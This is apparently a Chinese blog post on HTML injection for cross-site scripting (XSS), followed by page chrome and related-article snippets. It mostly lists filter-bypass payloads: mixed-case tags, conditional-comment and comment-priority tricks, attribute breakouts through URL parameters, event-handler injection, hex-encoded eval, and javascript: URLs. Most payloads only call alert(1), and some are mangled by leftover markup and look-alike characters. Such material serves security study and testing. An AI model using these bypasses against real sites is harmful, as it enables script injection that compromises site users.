XSS攻击之HTTP代码注入

最新推荐文章于 2024-02-17 21:20:52 发布
最新推荐文章于 2024-02-17 21:20:52 发布
阅读量6.4k 收藏 4
点赞数
分类专栏: web前端 XSS

HTML代码一般由标签名、属性名、属性值、文本、注释等组成。我们进行代码注入攻击,就是在这几个地方进行。

一、标签绕过

1、对标签名进行大小写混合,并不影响代码执行,有时却可以绕过过滤器。如:

<span style="font-size:14px;"><sCRipT></ScrIPt></span>

2、利用现代浏览器对XHTML的支持,可以在某些浏览器的某些版本插入XML代码、SVG代码或未知标签。如:

<span style="font-size:14px;"><XSS sytle="xss:expression(alert(1)) "/></span>
<pre name="code" class="javascript"><span style="font-size:14px;"><BGSOUND src="javascript:alert(1);" />等。</span>
<span style="font-size:14px;">3、分析过滤器缺陷,进行针对性绕过。分析过滤器缺陷需要长期的积累。</span>
<span style="font-size:14px;">4、利用注释绕过。如:</span>
<pre name="code" class="javascript"><span style="font-size:14px;"><!--aaa<!--aaa-->alert(1)--></span>
<span style="font-size:14px;">针对IE的特殊注释。</span>
<pre name="code" class="html"><span style="font-size:14px;"><!-- [if ie]>所有的IE可识别<![endif]-->
<!--[if]><script>alert(1)</script-->
<!--[if <img src=x οnerrοr=alert(2)//]>--></span>


 
 
5、利用标签、注释之间优先级的差异绕过。 

 

<pre name="code" class="javascript"><span style="font-size:14px;"><!-- <a href = "--><img src="javascript:alert(2) //" >test</a></span>
 

<pre name="code" class="html"><span style="font-size:14px;"><title><a href="</title><script>alert(1)</script>//"></span>
 

<pre name="code" class="html"><span style="font-size:14px;"><style><a href="</sytle><img src=x οnerrοr=alert(1)//"></span>
 

<pre name="code" class="html"><span style="font-size:14px;"><? foo="><script>alert(1)</script>">
<! foo="><script>alert(1)</script>">
</ foo="><script>alert(1)</script>">
<% foo="%><script>alert(1)</script>"></span>
 
二、属性注入 

 

<pre name="code" class="html"><span style="font-size:14px;">HTML属性按用途分,大致可以分为普通属性、事件属性、资源属性几种。</span>
 
1、在属性值的头部、尾部插入系统控制字符。
  

 

<pre name="code" class="html"><span style="font-size:14px;"><a &#8 href="&#32javascript:alert(1)">test</a>(注:&#8和&#32都是HTML编码,对应的是空格)(可在IE、Firefox、Chrome下执行)</span>
 

<span style="font-size:14px;"><a &#8 href="&#32javascript:alert(1)&#27">test</a>(&#27对应的也是空格,可能是tab)(可在IE和Firefox下执行)</span>
 

<span style="font-size:14px;">2、普通属性</span>
 

<span style="font-size:14px;">(1)如果我们可控制的是属性值</span>
 

<span style="font-size:14px;">a、若属性值没有用引号</span>
 

<span style="font-size:14px;">如:<font color=<?=$_GET['url']?> /></span>
 

<span style="font-size:14px;">利用方法比较简单,使用?url=x%20οnerrοr=alert(1)就可以使代码执行了。</span>
 

<span style="font-size:14px;">b、若属性值有引号</span>
 

<span style="font-size:14px;">如:<font color="<?_GET['url']?> /></span>
 

<span style="font-size:14px;">构造引号使引号闭合。?url=x"%20οnerrοr=alert(1)//</span>
 

<span style="font-size:14px;">若引号被过滤,或者做了HTMLENCODE转义,就放弃吧。不过有两个特例。</span>
 

<span style="font-family:System;font-size:14px;"><img src="x` ` <script>alert(1)</script>"` ` >(IE6)</span>
 

<span style="font-family:System;font-size:14px;"><img src= alt=" οnerrοr=alert(1)// " >(IE、Firefox、Chrome、Opera等)</span>
 

<span style="font-family:System;font-size:14px;">(2)事件属性</span>
 

<span style="font-family:System;font-size:14px;">除了上述方法外,最直接的方式是直接插入我们的代码等待用户来触发:</span>
 

<span style="font-family:Times New Roman;font-size:14px;"><a href="#" οnclick="do_some_func(\"<?_GET['a'] ?> \")">test</a></span>
 

<span style="font-size:14px;">可以构造如下输入:?a=x');alert(1);//或者?a=',alert(1),'</span>
 

<span style="font-size:14px;">代入如下:</span>
 

<span style="font-size:14px;"><a href="#" οnclick="do_some_func('x');alert(1);//')">test</a></span>
 

<span style="font-size:14px;"><a href="#" οnclick="do_some_func('',alert(1),')")">test</a>(注:利用了一个函数可以在另外一个函数中执行的特性)</span>
 

<span style="font-family:System;font-size:14px;">如果是一句话,可以直接写,如果是多句,则可以定义一个匿名方法,语句如下:</span>
 

<span style="font-family:Verdana;font-size:14px;"><a href="#" οnclick="do_some_func('', function(){alert(1); alert(2);}, '')">test</a></span>
 

<span style="font-family:Verdana;font-size:14px;">也可以通过十六进制编码的方式将多句合在一起。</span>
 

<span style="font-family:Verdana;font-size:14px;"><a href=”#“ οnclick="do_some_func('', eval('\x61\x6c\65.........'), '')">test</a></span>
 

<span style="font-family:Verdana;font-size:14px;">(3)资源类属性</span>
 

<span style="font-family:Verdana;font-size:14px;">资源类属性,属性值通过为URL,属性名一般是src或href。这些属性一般支持浏览器的预定义协议,比如http、ftp、file、https、javascript、vbscript、mailto、data等。这其中,有的是网络协议,比如http、ftp等,有的是本地协议,比如javascript、vbscript等。本地协议一般称之为伪协议,伪协议可以调用本地程序执行命令。</span>
 

<span style="font-family:Verdana;font-size:14px;">如:<img src  = "javascript:alert(1)" ></span>
 

<span style="font-family:Verdana;font-size:14px;">但这些一般都被屏蔽了(IE6以前,IE6没有屏蔽),现在可用的如:<iframe src="javascript:alert(1)"></span>
 

<span style="font-family:Verdana;font-size:14px;">
</span>
 

<span style="font-family:Verdana;">
</span>
 

 

 

 



 

</pre>
 

 

 

 

 

 

 

 

</pre>
 

 


                

        

        

    




    

      

        

            

              
                
                  thislocal
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                      0
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    4
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                  2
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      

            

                专栏目录
          










                



	

		

			

				
					
XSS跨站脚本注入详解

				
			

			

				

					qq_38634483的博客
				

				

					02-24
					
					986
					
				

			

		

		

			
				
XSS(Cross-site scripting)注入是一种Web安全漏洞,它允许攻击者在受害者的浏览器上执行恶意脚本,从而导致攻击者能够窃取受害者的敏感信息或者利用受害者的身份在应用程序上执行未经授权的操作。

			
		

	



                

              
                



	

		

			

				
					
xss漏洞jar.rar

				
			

			

				

					09-29
				

			

		

		

			
				
跨站脚本(Cross site script,简称xss)是一种“HTML注入”,由于攻击的脚本多数时候是跨域的,所以称之为“跨域脚本”。
我们常常听到“注入”(Injection),如SQL注入,那么到底“注入”是什么?注入本质上就是把输入的数据变成可执行的程序语句。SQL注入是如此,XSS也如此,只不过XSS一般注入的是恶意的脚本代码,这些脚本代码可以用来获取合法用户的数据,如Cookie信息。
或者当访问者浏览网页时恶意代码会被执行或者通过给管理员发信息的方式诱使管理员浏览,从而获得管理员权限,控制整个网站
攻击者利用跨站请求伪造能够轻松地强迫用户的浏览器发出非故意的HTTP请求,如诈骗性的电汇请求、修改口令和下载非法的内容等请求。
可以通过导入以下两个jar,通过配置实现xss漏洞修复,无需修改代码

			
		

	



                


  
              

                


	

		

			

				
					
XSS 注入漏洞处理

				
			

			

				

					布袋和尚
				

				

					04-29
					
					1115
					
				

			

		

		

			
				
今年是进入网络安全行业第1年,之前总是道听途说各种漏洞,不以为然。。前一阵子才切身体会到了漏洞,嗯,也是自己造成的,就是XSS注入漏洞。

该漏洞的意思是攻击者往 Web 页面里插入恶意 Script 代码,当用户浏览该页之时,嵌入其中 Web 里面的 Script 代码会被执行,从而达到恶意攻击用户的目的。

常见的场景是在网页中提交一些文本,如果文本如下:


<script>alert(“1”)</script >

提交之后,网页会弹出对话框,显示“1”。

解决这个问题的办

			
		

	





	

		

			

				
					
XSS攻击详解

					
最新发布

				
			

			

				

					xllllll___的博客
				

				

					02-17
					
					1177
					
				

			

		

		

			
				
1.盗用cookie,获取用户的敏感信息;2.利用iframe,frame等方式,以用户的身份执行一些管理动作,或者执行一些一般的行为比如说发私信,加好友等;3.在一些访问量极大的页面上进行XSS攻击可以攻击一些小型网站;4.利用一些可被攻击的域或者其它的域信任的特点,以受信任来源的身份请求一些平时不被允许的操作。

			
		

	



		

			
		



	

		

			

				
					
WEB漏洞之XSS注入解析

				
			

			

				

					于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
				

				

					11-05
					
					623
					
				

			

		

		

			
				
因此,不建议在URL中使用锚点注入来执行JavaScript代码,而应该使用更安全的方法,如在HTML文档中嵌入JavaScript代码或在外部JavaScript文件中编写代码。所以:document.location.href.indexOf("default=") 的作用就是检索:default= 第一次出现的位置,如果检索的字符串值没有出现,则该方法返回 -1 ,(没有是:=== -1;如果浏览器支持锚点注入,那么在URL的井号后面添加JavaScript脚本是可以运行的。

			
		

	





	

		

			

				
					
XSS注入测试

					
热门推荐

				
			

			

				

					u012114090的博客
				

				

					07-16
					
					4万+
					
				

			

		

		

			
				
XSS 全称(Cross Site Scripting) 跨站脚本攻击, 是Web程序中最常见的漏洞。指攻击者在网页中嵌入客户端脚本(例如JavaScript), 当用户浏览此网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的.  比如获取用户的Cookie,导航到恶意网站,携带木马等。作为测试人员,需要了解XSS的原理,攻击场景,如何修复。 才能有效的防止XSS的发生。

 

XSS ...

			
		

	





	

		

			

				
					
关于XSS脚本注入攻击和重定向攻击

				
			

			

				

					qq_33642970的博客
				

				

					01-07
					
					1471
					
				

			

		

		

			
				
1.脚本注入攻击

例如:

<SCRIPT SRC=http://***/XSS/xss.js></SCRIPT>

<IMG SRC=”javascript:alert(‘XSS‘)”>

更多请参考:

XSS脚本注入 - 美女爱找茬 - 博客园 (cnblogs.com)

那么怎么来预防这类攻击?

我们可以添加参数过滤,例如:

增加对get请求,form表单,json数据的过滤

将这五个文件导入项目即可



import org.springframew

			
		

	





	

		

			

				
					
网页脚本注入XSS漏洞

				
			

			

				

					weixin_68681298的博客
				

				

					07-21
					
					270
					
				

			

		

		

			
				
第一次登陆后服务端以set-cookie方式下发cookie,在登陆后的访问中都可以使用该cookie而不需要重复登陆,cookie里面有一些标志性信息,如什么时候过期(expires、max-age)后者优先生效,用户信息和对什么网页生效(path)等,在url上面锁的标志即可查看。个人愚见:就是每次都需要去进行代码注入注入后才可以去执行,执行后下一次需要的时候再去注入,就是每一次都进行注入才能进行执行,所以叫做反射型。Cookie的问题:下发过多占用客户端过多的存储空间,增加通信成本。

			
		

	





	

		

			

				
					
XSS注入(跨站脚本攻击)

				
			

			

				

					wwwwyyyrre的博客
				

				

					06-13
					
					5708
					
				

			

		

		

			
				
今天学习一下xss注入

			
		

	





	

		

			

				
					
奇安信安全扫描漏洞解决路径遍历和存储型xss和反射xss攻击漏洞

				
			

			

				

					11-09
				

			

		

		

			
				
亲测可用,中级漏洞,解决服务器段请求伪造 final String forURL = ESAPI.encoder().encodeForURL(url);...restTemplate.exchange(forURL, HttpMethod.GET,new HttpEntity<String>(headers), List.class, params);

			
		

	





	

		

			

				
					
csrf-nosqli-xss-application:演示CSRF,NoSQL注入XSS漏洞和保护的示例应用程序

				
			

			

				

					05-11
				

			

		

		

			
				
 master分支由unprotected分支和fix-*分支的合并组成,这意味着它包含的代码至少在理论上受到了上述三种类型的攻击的保护。 如果您发现任何缺陷,我很乐意在此项目的“问题”页面上了解它们! 特征 该应用程序本身...

			
		

	





	

		

			

				
					
xbackdoor:一种用于持续XSS开发的工具,主要针对移动Web浏览器

				
			

			

				

					02-02
				

			

		

		

			
				
 在攻击者站点中,有项目的所有文件: db.php-包含数据库配置getjs.php-将js代码发送到客户端acp /-包含所有要管理后门的文件现在,攻击者(使用持久性XSS)在目标站点中注入了这段代码: < script id =" scr72 ...

			
		

	





	

		

			

				
					
XSS跨站脚本攻击渗透与防御

				
			

			

				

					m0_57379855的博客
				

				

					03-05
					
					430
					
				

			

		

		

			
				
XSS跨站脚本攻击渗透与防御XSS跨站脚本攻击渗透与防御HTTP协议客户端Cookie服务端SessionJS操作Cookie脚本注入网页:XSS获得Cookie发送邮件XSS检测和利用xsser安装dvwa练习XSStrike
XSS跨站脚本攻击渗透与防御
HTTP协议
HTTP请求方式

get 请求从服务器获取资源
head 类似get请求,只不过不会返回实体数据,只获取报头
post  向服务器提交数据
put 替换服务器内容
delete 请求服务器删除指定的
trace 对链路进行测试或诊断
o

			
		

	





	

		

			

				
					
xss注入

				
			

			

				

					weixin_66218784的博客
				

				

					12-19
					
					1405
					
				

			

		

		

			
				
通过复现实验对xss漏洞进行理解

			
		

	





	

		

			

				
					
网站遭遇XSS注入如何排查及解决

				
			

			

				

					weixin_54232686的博客
				

				

					05-04
					
					1177
					
				

			

		

		

			
				
预防XSS注入及解决

			
		

	





	

		

			

				
					
Web安全-HTTP响应拆分(CRLF注入)漏洞

				
			

			

				

					道阻且长,行则将至。
				

				

					05-01
					
					4307
					
				

			

		

		

			
				
文章目录漏洞简介漏洞利用会话固定XSS攻击实战案例挖掘技巧漏洞防御
漏洞简介
CRLF 是 CR 和 LF 两个字符的拼接,它们分别代表 “回车+换行”(\r\n),全称为 “Carriage Return/Line Feed”,十六进制编码分别为0x0d 和 0x0a,URL编码为 %0D 和 %0A 。CR 和 LF 组合在一起即 CRLF 命令,它表示键盘上的 “Enter” 键,许多应用程序和网络协议使用这些命令作为分隔符。
在 HTTP 协议中,HTTP header 之间是由一个 CRLF 字符

			
		

	





	

		

			

				
					
xss-labs举例反射型xss注入的方式及基本思路

				
			

			

				

					五分之一世纪
				

				

					03-14
					
					893
					
				

			

		

		

			
				
<1>XSS的分类

1.反射型
2.dom型
3.存储型

反射型解析:反射型的数据走向是 客户端->服务器->客户端,XSS-LABS中全是这种类型的,或者也可以说是dom型的,客户端根据html网页源码,判断注入漏洞,不调用html中的js代码是反射型,而dom型则是直接调用网页源码中的js代码。
dom型解析:dom型的数据走向是 URL->浏览器。
存储型解析:存储型的数据走向是 客户端->服务器->数据库->服务器->客户端,比如有些网站有评

			
		

	





	

		

			

				
					
XSS 跨站脚本注入

				
			

			

				

					Zeker62的博客
				

				

					08-24
					
					759
					
				

			

		

		

			
				
什么是跨站脚本(XSS)?
跨站点脚本(也称为 XSS)是一种 Web 安全漏洞,允许攻击者破坏用户与易受攻击的应用程序的交互。它允许攻击者绕过旨在将不同网站彼此隔离的同源策略。跨站点脚本漏洞通常允许攻击者伪装成受害者用户,执行用户能够执行的任何操作,并访问用户的任何数据。如果受害者用户在应用程序中拥有特权访问权限,那么攻击者可能能够完全控制应用程序的所有功能和数据。
XSS 是如何工作的?
...

			
		

	





	

		

			

				
					
SQL注入XSS攻击

				
			

			

				

					05-09
				

			

		

		

			
				
SQL注入是一种常见的网络安全漏洞,攻击者可以通过在网站表单或URL参数中注入恶意SQL代码,来获取或篡改数据库中的数据。为防止SQL注入攻击,应该使用参数化查询或存储过程,而不是直接将用户输入拼接到SQL语句中。

XSS攻击(Cross-Site Scripting)是一种利用Web应用程序漏洞攻击用户的技术,攻击者可以在网页中插入恶意脚本代码,当用户浏览页面时,脚本代码会在用户浏览器中执行,从而窃取用户的信息或进行其他恶意操作。为防止XSS攻击,应该对用户的输入进行过滤和转义,以确保任何输入的内容都被视为数据而不是代码。另外,也可以使用HTTP头中的CSP(Content Security Policy)来限制网页中JavaScript的执行权限,从而防止XSS攻击

			
		

	



              



  
“相关推荐”对你有帮助么?

  

      
    
          
  • 
              
    
                  
                  
              
    
              
    非常没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    一般
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    有帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    非常有帮助
    
          
    • 
      

      

      

          
          提交
      

      

  




          




        



    





    



      

      

        
      

      





	

		
评论 2

	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值